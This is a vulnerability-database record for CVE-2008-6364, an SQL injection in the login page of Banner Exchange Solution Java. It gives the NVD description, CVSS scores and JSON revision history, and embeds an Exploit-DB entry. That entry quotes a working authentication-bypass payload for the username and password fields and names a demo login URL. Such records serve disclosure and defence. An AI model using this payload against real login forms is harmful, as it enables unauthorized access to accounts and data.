ID CVE-2008-6364Type cveReporter NVDModified 2017-09-28T21:33:08
Description
SQL injection vulnerability in logon_process.jsp in Ad Server Solutions Banner Exchange Solution Java allows remote attackers to execute arbitrary SQL commands via the (1) username (uname parameter) and (2) password (pass parameter). NOTE: some of these details are obtained from third party information.
{"id": "CVE-2008-6364", "bulletinFamily": "NVD", "title": "CVE-2008-6364", "description": "SQL injection vulnerability in logon_process.jsp in Ad Server Solutions Banner Exchange Solution Java allows remote attackers to execute arbitrary SQL commands via the (1) username (uname parameter) and (2) password (pass parameter). NOTE: some of these details are obtained from third party information.", "published": "2009-03-02T11:30:00", "modified": "2017-09-28T21:33:08", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6364", "reporter": "NVD", "references": ["http://packetstorm.linuxsecurity.com/0812-exploits/bej-sql.txt", "http://www.securityfocus.com/bid/32781", "https://www.exploit-db.com/exploits/7425", "https://exchange.xforce.ibmcloud.com/vulnerabilities/47281"], "cvelist": ["CVE-2008-6364"], "type": "cve", "lastseen": "2017-09-29T14:26:20", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:adserversolutions:banner_exchange_software:-:java"], "cvelist": ["CVE-2008-6364"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "SQL injection vulnerability in logon_process.jsp in Ad Server Solutions Banner Exchange Solution Java allows remote attackers to execute arbitrary SQL commands via the (1) username (uname parameter) and (2) password (pass parameter). NOTE: some of these details are obtained from third party information.", "edition": 2, "enchantments": {}, "hash": "1c01e52dddea53cb512b5043556b8790e01e8ceeca44580b4c835a813b158776", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "b06ace9da5ea28a0a1905bd252f9f706", "key": "references"}, {"hash": "513dc31759653d4a51af160a4f9773f4", "key": "modified"}, {"hash": "60cf0e28e2b514532ae83701526815cc", "key": "published"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "262e4cbc5df112912a3cade531d3c227", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "0c1b895a78bdc5d9b1a41df27d13efe0", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "a04bea9a9503ac6ddad98faf5a21f04f", "key": "title"}, {"hash": "b0d449585cd1cf560611effa54c1d2ac", "key": "cpe"}, {"hash": "221d4bb6fd841f6c4d6a6be22718163f", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6364", "id": "CVE-2008-6364", "lastseen": "2017-08-17T11:14:04", "modified": "2017-08-16T21:29:14", "objectVersion": "1.3", "published": "2009-03-02T11:30:00", "references": ["http://packetstorm.linuxsecurity.com/0812-exploits/bej-sql.txt", "http://www.securityfocus.com/bid/32781", "http://www.milw0rm.com/exploits/7425", "https://exchange.xforce.ibmcloud.com/vulnerabilities/47281"], "reporter": "NVD", "scanner": [], "title": "CVE-2008-6364", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-08-17T11:14:04"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:adserversolutions:banner_exchange_software:-:java"], "cvelist": ["CVE-2008-6364"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "SQL injection vulnerability in logon_process.jsp in Ad Server Solutions Banner Exchange Solution Java allows remote attackers to execute arbitrary SQL commands via the (1) username (uname parameter) and (2) password (pass parameter). NOTE: some of these details are obtained from third party information.", "edition": 1, "enchantments": {}, "hash": "7aaf68d5220351d9f0dae24136569ca541714c1c8cef223c93ccff7a2f26c88e", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "60cf0e28e2b514532ae83701526815cc", "key": "published"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "262e4cbc5df112912a3cade531d3c227", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "0c1b895a78bdc5d9b1a41df27d13efe0", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "e21cf306c268e1867168d4bd421c1555", "key": "references"}, {"hash": "a04bea9a9503ac6ddad98faf5a21f04f", "key": "title"}, {"hash": "b0d449585cd1cf560611effa54c1d2ac", "key": "cpe"}, {"hash": "221d4bb6fd841f6c4d6a6be22718163f", "key": "href"}, {"hash": "5925596be2bb72959260579a895d6d8e", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6364", "id": "CVE-2008-6364", "lastseen": "2016-09-03T11:40:12", "modified": "2009-06-19T00:00:00", "objectVersion": "1.2", "published": "2009-03-02T11:30:00", "references": ["http://packetstorm.linuxsecurity.com/0812-exploits/bej-sql.txt", "http://xforce.iss.net/xforce/xfdb/47281", "http://www.securityfocus.com/bid/32781", "http://www.milw0rm.com/exploits/7425"], "reporter": "NVD", "scanner": [], "title": "CVE-2008-6364", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T11:40:12"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "b0d449585cd1cf560611effa54c1d2ac"}, {"key": "cvelist", "hash": "0c1b895a78bdc5d9b1a41df27d13efe0"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "262e4cbc5df112912a3cade531d3c227"}, {"key": "href", "hash": "221d4bb6fd841f6c4d6a6be22718163f"}, {"key": "modified", "hash": "f196ab53eb51f1d6e3c94a6765f15f63"}, {"key": "published", "hash": "60cf0e28e2b514532ae83701526815cc"}, {"key": "references", "hash": "1725aa68196d8437bd0f5e4c1c9dab89"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "a04bea9a9503ac6ddad98faf5a21f04f"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "c5ebd3e1dbb0c868851715e0c3608a54fdeac32ed431843c85b2a2019fb7e991", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-09-29T14:26:20"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:7425"]}], "modified": "2017-09-29T14:26:20"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:adserversolutions:banner_exchange_software:-:java"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"exploitdb": [{"lastseen": "2016-02-01T02:11:35", "bulletinFamily": "exploit", "description": "Banner Exchange Java (Auth Bypass) SQL Injection Vulnerability. CVE-2008-6364. Webapps exploit for asp platform", "modified": "2008-12-11T00:00:00", "published": "2008-12-11T00:00:00", "id": "EDB-ID:7425", "href": "https://www.exploit-db.com/exploits/7425/", "type": "exploitdb", "title": "Banner Exchange Java Auth Bypass SQL Injection Vulnerability", "sourceData": "[\u00e2\u02dc\u00a2] \u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2{\u00d8\u00a8\u00d8\u00b3\u00d9\u2026 \u00d8\u00a7\u00d9\u201e\u00d9\u201e\u00d9\u2021 \u00d8\u00a7\u00d9\u201e\u00d8\u00b1\u00d8\u00ad\u00d9\u2026\u00d9\u2020 \u00d8\u00a7\u00d9\u201e\u00d8\u00b1\u00d8\u00ad\u00d9\u0160\u00d9\u2026}\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\u00e2\u02dc\u00a2\n\n [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability\n \n [~]Vendor: www.adserversolutions.com\n \n [~]Software: Banner Exchange Java \n \n [~]author: ((\u00d1\u008f3d D3v!L))\n \n [~] Date: 28.11.2008\n \n [~] Home: www.ahacker.biz\n \n [~] contact: N/A\n\n[~]\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0{R0}\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\u00e2\u02dc\u00a0\n \n [~] Exploit:\n \n [~] username: r0' or ' 1=1--\n [~] password: r0' or ' 1=1--\n \n \n [\u00e2\u02dc\u00a0]login 4 d3m0:\n \n www.adservingsolutions.com/xchange_java/logon_license.jsp\n \n [~]-----------------------------{str0ke}---------------------------------------------------\n \n [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker & K374 & /\\/\\4/\\/0/\\/\n [~]\n [~] spechial thanks : dolly & 7am3m & EL z0hery & BLACK R053 &{str0ke}\n [~]\n [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller\n [~]\n [~] xp10.biz & ahacker.biz\n [~]\n \n [~]--------------------------------------------------------------------------------\n\n# milw0rm.com [2008-12-11]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7425/"}]}
